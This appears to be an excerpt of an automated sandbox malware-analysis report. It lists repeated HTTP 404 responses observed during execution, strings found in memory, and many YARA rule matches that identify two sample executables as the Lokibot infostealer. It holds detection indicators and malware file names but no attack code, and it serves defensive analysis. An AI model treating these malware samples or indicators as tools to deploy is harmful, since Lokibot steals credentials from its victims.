Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Source: kzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, iWEWjTXiqXke.exe, 0000000A.00000002.1573168768.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iWEWjTXiqXke.exe, iWEWjTXiqXke.exe, 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
